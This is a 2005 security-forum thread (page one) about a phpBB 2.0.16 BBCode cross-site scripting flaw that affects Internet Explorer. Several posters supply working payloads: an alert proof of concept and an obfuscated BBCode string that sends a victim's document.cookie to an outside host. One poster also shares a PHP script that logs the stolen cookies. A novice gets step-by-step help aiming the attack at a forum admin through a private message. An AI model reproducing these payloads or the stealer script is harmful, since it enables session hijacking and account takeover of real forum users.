Waraxe IT Security Portal
Login or Register
October 14, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 83
Members: 0
Total: 83
Full disclosure
SEC Consult SA-20241009-0 :: Local Privilege Escalation via MSI installer in Palo Alto Networks GlobalProtect (CVE-2024-9473)
APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
SEC Consult SA-20240925-0 :: Uninstall Password Bypass in BlackBerry CylanceOPTICS Windows Installer Package (CVE-2024-35214)
Apple iOS 17.2.1 - Screen Time Passcode Retrieval (MitigationBypass)
CyberDanube Security Research 20240919-0 | Multiple Vulnerabilities in Netman204
Submit Exploit CVE-2024-42831
Stored XSS in "Edit Profile" - htmlyv2.9.9
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page 1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic View previous topic :: View next topic
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
PostPosted: Fri Jul 08, 2005 8:11 pm Reply with quote
zer0-c00l
Advanced user
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




More info in:
http://www.milw0rm.com/id.php?id=1095
View user's profile Send private message
PostPosted: Sat Jul 09, 2005 2:36 pm Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




waouh, a new flaw in phpBB ! Very Happy

i'm totally new in XSS Remote Cookie exploit, would you be kind to explain me (personnaly or with a good tutorial) how to use this exploit ?

thank you in advance. Wink
View user's profile Send private message
PostPosted: Sat Jul 09, 2005 9:01 pm Reply with quote
diaga
Regular user
Regular user
Joined: Jun 27, 2005
Posts: 22




Im getting


Code:
'
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 12:28 am Reply with quote
WaterBird
Active user
Active user
Joined: May 16, 2005
Posts: 37




Hmm posted and nothing happening :/
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:35 am Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




first of all nothing is there.
and it wont redirect.that link dont exist.

http://www.milw0rm.com/cgi-bin/shell.jpg

this exploit original come from http://antichat.ru/txt/phpbb/
and not ccteam as you can see from the exploit banner in milworm site.

http://antichat.ru/txt/phpbb/ <<< visit here .
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 5:39 am Reply with quote
g30rg3_x
Active user
Active user
Joined: Jan 23, 2005
Posts: 31
Location: OutSide Of The PE




First...
The Cross Site Scripting (aka XSS) bugs
just can executes in the client side

So...
This is not a simply bug that you execute and you get the admin hash

And What Can I Do With This???
You can send a exploit like /str0ke put in milw0rm, of course via pm and you can steal his cookie when it open de PM..
of course as you can read this bug just works with IE and not with others explorers

Can You Give a Poc??
umm the original ho is in russ give to PoC's

The first that prints a JS Alert with message lol
Code:

[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`alert('lol');this.sss=null`s='][/url][/url]'


The second steal a cookie, but you have to put the value of backgrounf inn the place were it comes ЦВЕТ_ФОНА
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


obviously like the str0ke bug you have to redirrect as your website for stealing the cookie:
http://antichat.ru/b.gif

so thats all about it

i think this info wold be very useful for some people
if you have questions you can answer here or by my msn..

regards
PD: There is no official patch so have fun...
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sun Jul 10, 2005 7:45 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




another bbcode flaw combination with Social engineering ,I think *_^

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Jul 10, 2005 8:54 am Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




First, thank you for your answers and your help ! Very Happy

subzero wrote:

this exploit original come from http://antichat.ru/txt/phpbb/
and not ccteam as you can see from the exploit banner in milworm site.

http://antichat.ru/txt/phpbb/ <<< visit here .

yes, i had read it (even if i don't speak russian Wink).

g30rg3_x wrote:

of course as you can read this bug just works with IE and not with others explorers

now i understant why i couldn't see it. lol

g30rg3_x wrote:

The second steal a cookie, but you have to put the value of backgrounf inn the place were it comes ЦВЕТ_ФОНА
Code:

[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


obviously like the str0ke bug you have to redirrect as your website for stealing the cookie:
http://antichat.ru/b.gif

humm, i've 2 questions...
1- the color ЦВЕТ_ФОНА... ... this value has to be changed with a color of the target forum, probably to hide the script... but what color ? you said the backgrounf inn but i don't understand... Embarassed

2- to redirect to our script stealer, by changing the http://antichat.ru/cgi-bin/s.jpg? url... : how to create our own cookie stealer ?

by the way, g30rg3_x, did you manage to use this exploit ?

thank you in advance. Wink
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 10:24 am Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




mmm
g30rg3_x

sorry but i dont understand what do you mean only work on IE ??
Wink

verbatim <<= exploit do work.

exploit.
http://kisobox.com/exploits/phpbb.2.0.16.xss+cookies.stealer.txt

it will be easy to understand by video.
http://kisobox.com/area51/phpbb2.0.16xss/

it will better to have own cookies stealer script rather to depend on antichat.ru
again. if you want to get the hash pass for admin then u just PM him/her.



Wink


Last edited by subzero on Sun Jul 10, 2005 1:55 pm; edited 1 time in total
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 11:20 am Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




great video subzero ! Very Happy

1- i still wonder... when you write
Quote:
template color,so no one can see it.
// you can do it.. by viewing page source code.

the template has many color... wich one do you mean ?

2- how to have our own cookies stealer script rather to depend on antichat.ru
again ?

thank you. Smile
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 11:48 am Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




about viewing source code. oohh .. Wink too many aa..
well forget bout it.

2. some code
for cookies stealer

<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>

Wink
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 12:20 pm Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




ok, so imagine
1- i create a file cookie.php with inside :
Code:
<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>


2- i change url of the exploit :
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

i tried to replace http://antichat.ru/cgi-bin/s.jpg? by http://mysite.com/cookie.php
but it creates no cookies.txt file, there's probably something wrong in my syntax Confused
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 12:21 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I was testing this bbcode flaw yesterday and it worked even here, at waraxe.us Laughing

Some remarks:

1. it will work with IE only (no Firefox, etc ...)
2. phpBB team has no clue about this and so most of the phpbb installations in the world are affected.
3. I was making some simple changes to bbcode regexes, so right now this forum is (hopefully) protected from specific exploit.

It's interesting to see, how much time it takes to phpBB developement team to release phpBB version 2.0.17 Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jul 10, 2005 12:30 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




verbatim

have u set chmod 777 to the cookies.txt ?

Wink its good if you release the patch for it.
waraxe.. Wink one of mysite.. vulnerable too.
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 12:44 pm Reply with quote
verbatim
Regular user
Regular user
Joined: Jul 09, 2005
Posts: 11




subzero wrote:
verbatim

have u set chmod 777 to the cookies.txt ?


yes i have... but this file is still empty Confused
any ideas ?
is there a mistake here :
Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

finally, did you manage to use this exploit with a personnal stealer script ?

(i know, a lot of question, but i guess it may help other readers Wink)
View user's profile Send private message
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 8
Goto page 1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds